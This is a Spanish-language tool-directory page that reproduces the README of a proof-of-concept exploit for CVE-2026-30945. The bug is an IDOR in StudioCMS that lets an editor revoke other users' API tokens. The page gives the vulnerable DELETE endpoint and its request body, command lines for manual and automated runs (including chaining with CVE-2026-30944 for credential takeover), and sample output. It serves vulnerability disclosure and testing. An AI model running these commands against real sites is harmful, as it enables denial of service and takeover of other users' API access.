Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

FeedsContactoPrivacidad© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-30945-PoC — Prueba de concepto del exploit para CVE-2026-30945, un IDOR en StudioCMS que permite la revocación arbitraria de tokens de API y la denegación de servicio. Incluye modos de prueba manual y automatizada. | Kitploit
Herramientas/GitHubGitHub/filipegaudard/cve-2026-30945-poc
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónSeguridad de APIs
GitHubfilipegaudard/cve-2026-30945-poc

CVE-2026-30945-PoC

Prueba de concepto del exploit para CVE-2026-30945, un IDOR en StudioCMS que permite la revocación arbitraria de tokens de API y la denegación de servicio. Incluye modos de prueba manual y automatizada.

Ver Repositorio
23hace 6 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

🗑️ CVE-2026-30945

StudioCMS IDOR — Revocación Arbitraria de Tokens API que Conduce a Denegación de Servicio

CVE CVSS CWE Type

NVD • Advisory • CWE-639


Resumen

El endpoint DELETE /studiocms_api/dashboard/api-tokens en StudioCMS ≤ 0.3.0 permite que cualquier usuario autenticado con privilegios de editor o superiores revoque tokens API pertenecientes a cualquier otro usuario, incluidas las cuentas admin y owner.

El manejador acepta tokenID y userID directamente del payload de la solicitud sin verificar la propiedad del token, la identidad del solicitante ni la jerarquía de roles. Esto permite una denegación de servicio dirigida contra integraciones y automatizaciones críticas.

Relacionado: Esta vulnerabilidad comparte la misma causa raíz que CVE-2026-30944 (IDOR en generación de tokens). Cuando se encadenan, un atacante puede revocar tokens legítimos y generar otros nuevos, logrando una toma de control completa de las credenciales API.

Flujo del Ataque

┌──────────────┐   DELETE /api-tokens        ┌──────────────┐
│              │  {"tokenID":"<id>",          │              │
│   Atacante   │   "userID":"<owner-id>"}     │  StudioCMS   │
│   (Editor)   │ ──────────────────────────► │   Servidor   │
│              │                              │              │
│              │ ◄────────────────────────── │              │
└──────────────┘  {"message":"Token deleted"} └──────────────┘
                                                     │
                                                     ▼
                                              ┌──────────────┐
                                              │  Pipeline    │
                                              │  CI/CD del   │
                                              │  Propietario │──► ❌ 401 No Autorizado
                                              │  Integración │──► ❌ Acceso API Perdido
                                              │  Monitoreo   │──► ❌ Fallo Silencioso
                                              └──────────────┘

Detalles de la Vulnerabilidad

CampoValor
CVECVE-2026-30945
GHSAGHSA-8rgj-vrfr-6hqr
CVSS v3.17.1 (Alta) — AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H
CWECWE-639: Bypass de Autorización Mediante Clave Controlada por el Usuario
CWE (secundaria)CWE-863: Autorización Incorrecta
MITRE ATT&CKT1531 — Eliminación de Acceso a Cuenta
OWASP APIAPI1:2023 — Autorización de Nivel de Objeto Rota
Afectadostudiocms ≤ 0.3.0
Corregido enstudiocms 0.4.0

Contenido

ArchivoDescripción
cve_2026_30945_poc.pyScript de explotación en Python con modos manual y automatizado
README.mdEste archivo
LICENSELicencia MIT

Requisitos Previos

  • StudioCMS ≤ 0.3.0 (versión vulnerable)
  • Python 3.8+
  • Credenciales válidas para al menos una cuenta Editor
  • Un UUID de registro de token conocido (ID interno, no el JWT)
pip install requests colorama

Inicio Rápido

Explotación Manual

# Revocar un token específico perteneciente al propietario
python3 cve_2026_30945_poc.py \
  -u http://localhost:4321 \
  --username editor01 \
  --password editorpass \
  --target-uuid 2450bf33-0135-4142-80be-9854f9a5e9f1 \
  --token-id 16a2e549-513b-40ac-8ca3-858af6118afc

# Encadenar con CVE-2026-30944: crear un token para el objetivo primero
python3 cve_2026_30945_poc.py \
  -u http://localhost:4321 \
  --username editor01 \
  --password editorpass \
  --target-uuid 2450bf33-0135-4142-80be-9854f9a5e9f1

# Guardar resultados en JSON
python3 cve_2026_30945_poc.py \
  -u http://localhost:4321 \
  --username editor01 \
  --password editorpass \
  --target-uuid 2450bf33-0135-4142-80be-9854f9a5e9f1 \
  --token-id 16a2e549-513b-40ac-8ca3-858af6118afc \
  --save

Pruebas Automatizadas

# Probar con múltiples roles
python3 cve_2026_30945_poc.py \
  -u http://localhost:4321 \
  --auto-test \
  --editor-user editor01 \
  --editor-pass editorpass \
  --visitor-user visitor01 \
  --visitor-pass visitorpass \
  --target-uuid 2450bf33-0135-4142-80be-9854f9a5e9f1 \
  --token-id 16a2e549-513b-40ac-8ca3-858af6118afc

Argumentos

Obligatorios

ArgumentoDescripción
-u, --urlURL base de StudioCMS objetivo
--target-uuidUUID del usuario objetivo cuyo token será revocado

Opcionales

ArgumentoDescripción
--token-idUUID interno del registro de token a revocar (no el JWT). Si se omite, el script intentará crear un token primero mediante CVE-2026-30944

Modo Manual

ArgumentoDescripción
--usernameNombre de usuario para autenticación
--passwordContraseña para autenticación

Modo de Prueba Automatizada

ArgumentoDescripción
--auto-testHabilitar pruebas automatizadas de múltiples roles
--editor-userNombre de usuario de la cuenta Editor
--editor-passContraseña de la cuenta Editor
--visitor-userNombre de usuario de la cuenta Visitante
--visitor-passContraseña de la cuenta Visitante

Banderas

ArgumentoDescripción
--saveGuardar resultados en archivo JSON
--no-ssl-verifyDeshabilitar verificación de certificado SSL

Ejemplo de Salida

Sistema Vulnerable

  ──────────────────────────────────────────────────────────
  FASE 1: Autenticación
  ──────────────────────────────────────────────────────────
  [+] Autenticado como 'editor01'
  [*] Usuario de sesión: editor01 (editor)
  [*] UUID de sesión: 39b3e7d3-5eb0-48e1-abdc-ce95a57b212c

  ──────────────────────────────────────────────────────────
  FASE 3: Revocación de Token (IDOR)
  ──────────────────────────────────────────────────────────
  [*] UUID objetivo: 2450bf33-0135-4142-80be-9854f9a5e9f1
  [*] ID de token:    16a2e549-513b-40ac-8ca3-858af6118afc
  [*] Revocando token API del objetivo...
  [+] ¡Token revocado! Respuesta del servidor: Token deleted
  [!] VULNERABILIDAD CONFIRMADA — ¡Token revocado exitosamente!
  [!] Las integraciones API del usuario objetivo ahora están rotas (DoS)

Sistema Parcheado

  ──────────────────────────────────────────────────────────
  FASE 3: Revocación de Token (IDOR)
  ──────────────────────────────────────────────────────────
  [*] UUID objetivo: 2450bf33-0135-4142-80be-9854f9a5e9f1
  [*] ID de token:    16a2e549-513b-40ac-8ca3-858af6118afc
  [*] Revocando token API del objetivo...
  [*] Acceso denegado (403 Prohibido) — el endpoint puede estar parcheado
  [-] Revocación fallida: Acceso denegado (403 Prohibido)

Cadena de Ataque (CVE-2026-30944 + CVE-2026-30945)

Cuando se combina con el IDOR de generación de tokens (CVE-2026-30944), un atacante puede realizar una toma de control completa de las credenciales API:

Descargar herramienta